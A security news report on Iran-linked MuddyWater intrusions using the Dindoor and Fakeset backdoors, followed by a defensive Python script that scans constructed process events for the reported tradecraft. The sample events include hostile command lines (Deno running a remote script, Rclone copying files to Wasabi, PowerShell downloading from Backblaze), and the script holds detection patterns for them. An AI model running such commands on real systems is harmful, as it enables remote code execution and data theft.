Iran-linked MuddyWater embeds Dindoor backdoor in multiple U.S. corporate networks

A technical analysis by Broadcom's Symantec and Carbon Black Threat Hunter Team found evidence of an Iranian-linked hacking group embedding itself in multiple U.S. corporate networks, including banks and an airport, in activity detected in early March.

KEY FACTS

  • Incident: Intrusions into banks, an airport, a non-profit, and an Israeli software subsidiary
  • Attribution: MuddyWater, affiliated with Iran's Ministry of Intelligence and Security
  • Malware: Dindoor backdoor, which runs on the Deno runtime, and a Python backdoor called Fakeset
  • Data exfiltration: Attempt observed using Rclone to a Wasabi cloud storage bucket; success unknown

The campaign is assessed to have started in early February and activity continued after recent U.S. and Israeli military strikes on Iran. Targets included U.S. banks, an airport network, a Canadian non-profit, and an Israeli arm of a software supplier to defense and aerospace firms.

A previously unknown backdoor named Dindoor was observed. Dindoor executes code via the Deno JavaScript runtime. On the same intrusion set, an attempt to move data to a Wasabi cloud storage bucket using the Rclone utility was recorded, though it is not known whether any data actually left the network.

On other hosts a Python backdoor called Fakeset was downloaded from Backblaze servers. The code-signing certificate used to sign Fakeset has also been used to sign the Stagecomp and Darkcomp malware families, which have been linked to the same actor.

Operators used credential theft and social engineering to gain initial access and maintained persistence with commodity tools and cloud utilities rather than bespoke tooling. Recommended steps for defenders include enforcing phishing-resistant multi-factor authentication, applying network segmentation, removing unnecessary internet exposure, and keeping internet-facing systems patched.

WHY IT MATTERS

The intrusions show that state-linked actors are using widely available runtimes and cloud tools to persist in corporate environments and to attempt data theft, which lets their activity blend in with legitimate administration. Organizations in the affected sectors should harden access controls and increase monitoring for anomalous use of scripting runtimes (such as Deno) and cloud storage utilities (such as Rclone) on endpoints.
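The monitoring recommendation above can be turned into a concrete hunt over process-creation telemetry. The following is an added illustrative example, not code from the Symantec/Carbon Black analysis or from the attacker's toolset: it scans constructed Sysmon-style JSON events for the tradecraft the article names (the Deno runtime executing a remote script, Rclone transfers from hosts where it is not sanctioned, and command lines referencing Wasabi or Backblaze storage). The sample events, the endpoint domains (wasabisys.com, backblazeb2.com), the host allow-list and the rule names are all assumptions made for the example; tune them to your own environment.

```python
"""Toy detection pass over constructed process-creation events.

Added example, not code from the referenced report. Assumes Sysmon-like JSON
events with host/user/image/cmdline/parent fields; the endpoint domains and the
allow-list of hosts where rclone is sanctioned are assumptions.
"""
from __future__ import annotations

import json
import re

# Constructed sample events, one JSON object per line (not data from the incident).
SAMPLE_EVENTS = r"""
{"host":"wks-014","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\svchost.exe","cmdline":"svchost.exe -k netsvcs","parent":"services.exe"}
{"host":"wks-014","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\deno\\deno.exe","cmdline":"deno.exe run --allow-all https://cdn.example.invalid/update.js","parent":"powershell.exe"}
{"host":"fs-02","user":"CORP\\svc_backup","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe copy D:\\Finance remote:staging --s3-endpoint s3.wasabisys.com","parent":"cmd.exe"}
{"host":"wks-021","user":"CORP\\asmith","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -c Invoke-WebRequest https://f000.backblazeb2.com/file/x/setup.py -OutFile c:\\temp\\setup.py","parent":"winword.exe"}
{"host":"bkp-01","user":"CORP\\svc_backup","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe sync D:\\Backups onsite:backups","parent":"svchost.exe"}
""".strip()

# Assumption: hosts where rclone is an expected, sanctioned backup tool.
KNOWN_RCLONE_HOSTS = {"bkp-01"}

# Deno invoked with the `run` subcommand (Dindoor executes code via the Deno runtime).
DENO_RUN = re.compile(r"(?:^|[\\/ ])deno(?:\.exe)?\s+run\b", re.I)
# Any http(s) URL on the command line, i.e. a script fetched rather than run from disk.
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
# Rclone data-movement subcommands.
RCLONE_TRANSFER = re.compile(r"(?:^|[\\/ ])rclone(?:\.exe)?\s+(?:copy|sync|move|copyto|moveto)\b", re.I)
# Assumed endpoint domains for the two cloud storage providers named in the article.
CLOUD_STORAGE = re.compile(r"\b(?:wasabisys|backblazeb2)\.com\b", re.I)


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    cmd = event.get("cmdline", "")
    hits: list[str] = []
    if DENO_RUN.search(cmd) and REMOTE_URL.search(cmd):
        hits.append("deno-runs-remote-script")
    if RCLONE_TRANSFER.search(cmd) and event.get("host") not in KNOWN_RCLONE_HOSTS:
        hits.append("rclone-transfer-unexpected-host")
    if CLOUD_STORAGE.search(cmd):
        hits.append("cloud-storage-endpoint-in-cmdline")
    return hits


def scan(lines: str) -> list[tuple[str, str, str]]:
    """Parse newline-delimited JSON events and return (host, rule, cmdline) findings."""
    findings: list[tuple[str, str, str]] = []
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a malformed line rather than abort the whole pass
        for rule in classify(event):
            findings.append((event.get("host", "?"), rule, event.get("cmdline", "")))
    return findings


if __name__ == "__main__":
    for host, rule, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host:8} {rule:36} {cmdline}")
```

Against the constructed events the pass reports the Deno remote-script launch on wks-014, both the unexpected Rclone transfer and the Wasabi endpoint on fs-02, and the Backblaze download on wks-021, while the sanctioned backup job on bkp-01 is suppressed by the allow-list. The allow-list is the part that needs local tuning: commodity tools like Rclone are exactly the ones with legitimate users, so the detection value comes from knowing where they are expected, not from the binary name alone.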